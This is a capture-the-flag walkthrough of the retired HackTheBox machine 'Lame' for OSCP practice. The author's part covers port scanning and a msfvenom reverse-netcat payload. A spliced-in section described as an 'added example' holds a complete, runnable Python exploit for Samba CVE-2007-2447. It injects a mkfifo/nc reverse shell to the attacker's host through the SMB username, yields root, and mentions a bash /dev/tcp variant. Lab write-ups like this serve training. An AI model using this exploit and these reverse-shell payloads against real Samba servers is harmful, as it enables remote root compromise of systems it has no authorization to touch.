Lame | HTB | Walkthrough w/o Metasploit

Lame is a retired box on HackTheBox. I am currently preparing for the OSCP, and this box is on TJ_Null's list of OSCP-like VMs, so I am going to do it without Metasploit (since Metasploit is allowed only once in the exam). Let us begin.

SCANNING:

port-scan result

I did a simple port scan and found ports 21, 22, 139 and 445 to be open.

service-scan result

-p : specifying ports.

-sV : version detection.

Here I did a service version scan (the -sV switch of nmap) to find out exactly which software versions are running on those ports.

Let us now dig deeper and do a nmap default script scan (with the -sC switch).

script-scan results

-sC : default script scan.

I could not capture the whole screen as the output was quite large, but the shot above has everything we need to know.

The script scan reveals that the box is running Samba 3.0.20-Debian on port 445. Note that this exact version comes from the smb-os-discovery script; -sV on its own only reports a generic "Samba smbd 3.X - 4.X", which is not enough to pick an exploit.

EXPLOITATION :

After a google search, I found this exploit on github.

exploit

However, for the exploit to work you need to modify it slightly: you have to put your own IP address and port into the reverse-shell payload.

I am going to generate the payload with msfvenom and assign it to the buf variable.

msfvenom -p cmd/unix/reverse_netcat LHOST=<IP> LPORT=<PORT> -f python

Copy the output and paste it on the exploit code. On a second terminal tab, set up a netcat listener.

nc -nlvp <PORT>

Remember to listen on the same port that you provided as LPORT in the payload.

Run the python code, and you should get a shell.
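The three steps above (generate the payload, start the listener, run the exploit) can be understood better by building the moving parts by hand. The script below is an added example, not the github exploit the post uses: it reproduces what msfvenom's cmd/unix/reverse_netcat payload does (a named pipe wiring nc into /bin/sh), renders it in the same `buf` shape that `-f python` produces so it can be pasted into any exploit expecting that variable, and shows how the exploit for this Samba version delivers it. The delivery relies on the publicly documented weakness in Samba 3.0.20 through 3.0.25rc3 (CVE-2007-2447): the username from an SMB session setup is handed to the configured "username map script" through /bin/sh without escaping, so backticks in the username execute commands as the smbd user. The SMB connection uses pysmb (`pip install pysmb`), which is an assumption; the IP addresses and port are placeholders.

```python
#!/usr/bin/env python3
"""Added example (not the post's github exploit): build the reverse-shell
payload by hand and deliver it through Samba 3.0.20's username map script
injection (CVE-2007-2447).

Assumptions not from the original post: pysmb is installed for the SMB
session, and the attacker/target addresses are placeholders.
"""
import sys


def reverse_netcat_cmd(lhost: str, lport: int, fifo: str = "/tmp/f") -> str:
    """Same technique as msfvenom's cmd/unix/reverse_netcat: a named pipe
    feeds nc's input into /bin/sh and the shell's output back into nc.
    Caveat: this needs an nc binary on the target (Lame has one)."""
    return (f"rm -f {fifo}; mkfifo {fifo}; "
            f"nc {lhost} {lport} 0<{fifo} | /bin/sh >{fifo} 2>&1; rm -f {fifo}")


def as_python_buf(cmd: str, width: int = 60) -> str:
    """Render a command the way `msfvenom -f python` does: a `buf` variable
    assembled from fixed-width byte-string chunks, ready to paste into an
    exploit that expects `buf` to hold the payload."""
    data = cmd.encode()
    lines = ['buf = b""']
    for i in range(0, len(data), width):
        lines.append("buf += " + repr(data[i:i + width]))
    return "\n".join(lines)


def usermap_username(cmd: str) -> str:
    """Username that triggers CVE-2007-2447. Samba 3.0.20-3.0.25rc3 passes the
    login name to the `username map script` via /bin/sh unescaped, so the
    backticks run `cmd`; nohup keeps it alive after the failed login."""
    return "/=`nohup " + cmd + "`"


def deliver(target: str, username: str, port: int = 445) -> None:
    """Send the crafted username in an SMB session setup (pysmb, assumed
    installed). The login itself is expected to fail; the injected command
    has already run by then, so errors are ignored."""
    from smb.SMBConnection import SMBConnection  # pip install pysmb

    conn = SMBConnection(username, "", "", "",
                         use_ntlm_v2=False, is_direct_tcp=(port == 445))
    try:
        conn.connect(target, port)
    except Exception:
        pass
    finally:
        conn.close()


if __name__ == "__main__":
    # usage: python3 lame.py <LHOST> <LPORT> <RHOST>   (placeholders, e.g. 10.10.14.2 4444 10.10.10.3)
    lhost, lport, rhost = sys.argv[1], int(sys.argv[2]), sys.argv[3]
    cmd = reverse_netcat_cmd(lhost, lport)
    print(as_python_buf(cmd))  # the buf block you would otherwise paste from msfvenom
    deliver(rhost, usermap_username(cmd))
```

Start `nc -nlvp <LPORT>` first, exactly as in the post; the shell arrives on that listener because smbd on Lame runs as root and the injected command inherits that context. If the box had no nc, the same script could carry a different command (for example a bash /dev/tcp one-liner) without changing the delivery code.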

running exploit

We do not need to escalate our privileges, as we are already root: smbd runs as root, so the command injected through it runs as root too. Now you can read and submit the flags.

So that was the Lame box. Hope you liked it :)

THANK YOU ; )

Breaking things like a bàKà